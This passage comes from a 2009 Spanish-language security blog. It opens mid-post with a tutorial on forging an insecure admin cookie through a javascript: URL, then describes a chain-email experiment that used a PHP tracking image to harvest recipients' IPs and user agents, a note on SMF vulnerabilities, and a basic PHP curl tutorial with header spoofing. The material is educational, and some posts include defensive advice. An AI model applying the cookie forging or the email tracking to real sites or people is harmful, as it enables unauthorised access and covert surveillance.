include "/admin.html";
}
else {
die('no eres el admin'); }


Recuerda el tutorial de argument injection ya pues esto va a ser algo parecido... el anterior code dice que si nosotros tenemos testcookie entonces nos hara un include del admin.php

Ahora miren el code del login...


if($_POST['pass'] == $hashedpass) {
setcookie("testcookie","1"); //esto lo vimos antes
} else {
die("no entraste");
}


como ven lo que dice es lo siguiente... si nuestra pass es la pass que haya escojido el administrador nos asigna una cookie que es testcookie y cuando apretamos mas abajo pregunta en el code digamos que esta lo mismo que pusimos en el code numero 1:

if($_COOKIE['testcookie']=="1")
{
include "/admin.html";
}
else {
die('no eres el admin'); }

jeje ahora si creo que no puede estar mas claro pero en resumen es... si la pass es correcta nos pone una cookie y si la tenemos nos lleva a admin.php


Ahora si ni mas que decir la expl0tación...


vamos a nuestro browser...

y donde se pone la url ponemos:

javascript:document.cookie = "/testcookie_path/index.html";


como ven nos hemos asignado la cookie... y el path=/ quiere decir que nos va a funcionar en todo el dominio... pero también podemos usar los headers... con el live-http-headers y hacer un set-cookie y ponernosla pero bueno ahora si creo que ya solo nos queda navegar y buscar lo que nos interese.


Ustedes pensarán como obtenemos la cookie pues esa es la parte difícil, por eso en previas entradas he hablado sobre un par...


Session Prediction

Robo de cookies por un Xss

Ahora si no pueden hacer ninguna de estas puede ser con algo de ingeniería social...

-------------


como lo reparamos?

Esta pregunta tiene muchas respuestas como la mayoría de preguntas en lo que es seguridad informática pero pues la que yo les puedo dar es que usen sesiones, en el caso muy no recomendado que quieran usar cookies pues les recomiendo que hagan la cookie random y que duren maximo 1h cosa que el atacante no tenga mucho tiempo y que el administrador tenga sierto tiempo en poner solo lo necesario.


Espero les sirva este tutorial...



Saludos
Dr.White

viernes 4 de diciembre de 2009

Cadenas...

mi bebe se va a morir necesito que pasen esta cadena a 10 personas para que me donen dinero y pueda salvarlo...


Crueles cosas de este estilo nos llegan a nuestro mail y pues quería comprobar que tan posible era obtener IPs y contar cuantas veces se leia el mail que yo envie, cree una absurda historia sobre que se cumpliria un milagro y eso absurdo que la gente cree, no hace falta ser informático para saberlo, nunca reenvie una cadena en mi vida solo cosas interesantes como mails chistosos pero no cosas que te obligan a reenviarla... y bueno use esta técnica y fui a analizando mas cosas que les contaré en el camino de la entrada.


Primero les voy a contar que son las cadenas y como funcionan...


La mayoría de cadenas son para recolectar mails para spam con la esperanza de recolectar mas mails que los de la lista de contactos, también con ellos se busca en muchas ocaciones crear una estrategia para luego decir algo que afecte a la gente, en una ocación me llego un correo de la elefantiasis dos dias despues me llego un mail de una marca de cremas que me la curaba... disculpen pero eso nisiquiera se cura de esa manera entonces decidí simplemente analizar el correo y pues era una estrategia de venta y robo de dinero...

esto en las personas crea miedo entonces mucha gente les aseguro que compro la crema preventiva y curativa de elefantiasis...

bueno ahora también podemos ver las típicas cadenas que te dicen que descargues cosas y que por ahí se puede esconder un gusanito como un análisis de una carta online que hizo jbyte ahora como ven nos podriamos infectar de esa manera solo un pequeño cliente servidor en visual basic serviría para leer algo de lo que nos interese o meterle un gusanito... ahora ya que tenemos una visión básica les voy a contar lo que hice...


POEMA...


Pide un deseo...



si lo envias a 5 personas en los proximos 10 min


se te cumplirá mañana mismo



Ahora como ven es una estructura básica pero resulta que hice algo... puse imagenes en algunas partes del correo... supongo que ya se imaginan... a conseguir IPs y User Agents...


Con un correo tan simple saque mas de 200 IPs y 200 user Agents...


Con un poco de php y un poco de astucia puse un .php en una etiqueta IMG




<img src="http://test.seguridadblanca.org/test-robo.php>


entonces cada ves que entraban al mail enviandolo solo a 4 personas obtuve 200 ips y mas...


Ahora imaginen como creen que los atacantes obtienen tantas victimas... ya lo saben... por eso tengan cuidado que correos habren y cuales no habren...


para los Administradores en sistemas de sus compañias:


Por motivos como estos se infectan muchos usuarios ustedes deberían capacitar a los usuarios para identificar el software malicioso y los mails malicisos ya que no solo corre peligro el trabajdor sino los sistemas de la oficina...



Saludos
Dr.White

jueves 3 de diciembre de 2009

40 Vulnerabilidades en SMF por elhacker.net

elhacker.net sino me equivoco es la comunidad de hacking mas grande de habla hispana y elhacker.net usaba smf 1.1.10 pero querían migrar a las versión 2 de smf y decidieron hacer auditoria, el team se llama SimpleAudit 2.0 y pues se encontraron mas de 40 vulnerabilidades, a la par con ellosbusque vulnerabilidades y encontre dos Xss que fueron reportados por ellos, sacaron las versión 1.1.11 para que la puedan parchear de tantos bugs su web con SMF.


Refrencias...


Ref1

Ref2

ref3


para que actualizen sus SMF den click aquí para ir a la web de descargas


Saludos
Dr.White

miércoles 2 de diciembre de 2009

Orientación del PHP al PenTest - curl() [Tuto I]

Hoy voy a hablar de la funcion Curl() de PHP, por el momento lo haremos todo con PHP por el hecho de ser mas comercial que otros lenguajes que contienen esta funcion.


Esta funcion no muchos conocen, se omite muchas veces en el momento de enseñar lenguajes pero con esta se nos facilita mucho lo que es ataque por headers y las descargas que haciamos por headers la podriamos hacer en menos lineas...


Ahora si a la práctica que es lo que nos gusta a todos...

En primera vamos a crear algo simple pero previo les voy a enseñar las funciones mas básicas...


curl_init --> es la funcion que se usa para hacer conexión básica a una direccion web.

curl_opt --> Opt viende de option esta es la funcion que mas trabaja con esto le decimos que opcion de curl queremos que se haga.

curl_exec --> ejecutas el script mejor dicho hace que el curl funcione...(en resumen)

curl_close --> Cierra el Curl, lo termina...


Ahora si miren en primer lugar siempre hay que poner algo como la url que queremos...


<?php

$web = "seguridadblanca.org";

?>


una ves que tenemos eso ya el resto es funciones de curl... les daré el codigo para llamar una web pero despues les explicaré el code...



<?php

$web = "seguridadblanca.org";

$cu = curl_init($web);

curl_setopt($cu, CURLOPT_RETURNTRANSFER, true);

$cu_call = curl_exec($cu);

curl_close($cu);

echo $cu_call;

?>


Listo ahora la primera linea ya vimos para que sirve ahora la segunda...fácil solo empieza la conexion es como si le asignaramos una cookie a la navegación... ahora en el caso de la terceya ya le estamos dando las opciones a hacer, le decimos que a nuestra conexion le haga un returntransfer es decir que devuelva los packetes necesarios y eso que sea 1 es decir que sea true o verdadero.

La cuarta línea pues lo unico que hace es darle un nombre a la ejecución dice ahora ejecuten, es como nuestro F5, ahora si luego ya solo mostramos y cerramos, como se habran dado cuenta es como un socket pero mas fácil de usar nuestro code con sockets necesitaba mas code y eso que ahora hemos hecho un code simple entonces no hay mucha diferencia pero podemos hacer cosas mas utiles...

tenemos para elegir...

CURLOPT_USERAGENT
CURLOPT_COOKIE

Miren como nos asignamos una navegada bien chevere, digamos para tener de referer milw0rm:


$ch = curl_init();
//options
curl_setopt($ch, CURLOPT_URL, "/index.html");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_REFERER, "http://www.milw0rm.com");
curl_setopt($ch, CURLOPT_USERAGENT, "Firefox-beta");

// Se obtiene la URL indicada
curl_exec($ch);

// Se cierra el recurso CURL y se liberan los recursos del sistema
curl_close($ch);


Como ven hemos hecho una conexion rápida sin mostrar nada especial y sin usar tantas variables de especificación sin embargo nos hemos ahorrado algo como:


$cabecera = "GET /web/index.php HTTP/1.1\r\n";
$cabecera .= "Host: host.com\r\n";
$cabecera .= "User-Agent: firefox-beta\r\n";
$cabecera .= "Referer: milw0rm.com\r\n";
$cabecera .= "Connection: Close\r\n\r\n";


como ven con el curl todo es mas simple, yo se que el tuto es un poco confuso sin embargo he intentado explicarme de la mejor manera, es solo un tuto muy básico la proxima semana haré otro que será de como hacer post de cosas para explotar bugs de flooding en correos y visitas...


saludos
Dr.White